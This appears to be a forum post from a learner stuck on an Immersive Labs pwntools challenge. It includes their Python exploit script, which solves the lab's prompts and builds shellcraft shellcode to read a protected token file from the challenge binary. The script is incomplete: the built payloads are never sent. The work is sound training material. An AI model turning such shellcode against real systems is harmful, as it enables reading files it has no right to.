Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs
Pwntools: Ep. 6 — Demonstrate Your Skills
And I got stuck in the last step. I've tried the solution for using cat2 (from but it is still not working. Could you please help me with this if possible
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried
from pwn import *
import struct
# Start the challenge binary
p = process("/opt/demonstrate-challenge") # Use the correct path
# === Part 1: Solve Arithmetic Challenge ===
p.recvuntil(b"What is the sum of ")
numbers = p.recvline().decode().strip().split(" and ")
num1 = int(numbers[0])
num2 = int(numbers[1].split("?")[0])
print(f"[+] Solving: {num1} + {num2} = {num1 + num2}")
p.sendline(str(num1 + num2))
# === Part 2: Solve Packing Challenge ===
p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n")
values = p.recvline().decode().strip().split(" and ")
val1 = int(values[0])
val2 =int(values[1])
print(f"[+] Packing values: {val1} and {val2}")
payload = struct.pack("<II", val1, val2)
# === Part 3: Leak Address of parsing_check() ===
elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary
parsing_check_addr = elf.symbols['parsing_check'] # Get function address
print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}")
# === Part 4: Send Shellcode to Read /home/token-user/token.txt ===
file_path = '/home/token-user/token.txt'
shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode
shellcode += shellcraft.ret() # Ensure proper return
assembled_shellcode = asm(shellcode)
# === Get Flag Output ===
response = p.recvall()